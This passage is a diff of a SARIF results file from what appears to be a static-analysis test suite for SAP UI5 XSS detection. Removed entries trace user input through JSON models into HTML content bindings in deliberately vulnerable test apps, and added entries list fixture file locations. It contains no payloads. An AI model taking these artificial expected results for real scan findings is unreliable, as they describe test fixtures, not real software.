"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5d5122f6c75b5d01:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "/input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - }, - "message" : { - "text" : "/input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c18df3aa119b40dc:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "\"value\": \"{/input}\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - }, - "message" : { - "text" : "\"content\": \"{/input}\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "74b35e217af6aa05:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9caa0f252fbe2993:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 31, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 10, - "startColumn" : 44, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 32, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output1: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output1}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "2963bbd458e69924:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "oEvent. ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 60 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 19, - "startColumn" : 44, - "endColumn" : 55 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 34, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output3: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output3}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1406455ac263a2d9:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 12, - "startColumn" : 26, - "endColumn" : 46 - } - }, - "message" : { - "text" : "new JSONModel(oData)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 48 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 29 - } - }, - "message" : { - "text" : "output: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - }, - "region" : { - "startLine" : 8, - "startColumn" : 40, - "endColumn" : 63 - } - }, - "message" : { - "text" : "\"contro ... l.json\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5edd24be658b61a4:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "data-value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - }, - "message" : { - "text" : "data-content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6e0d8f690e30e24a:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 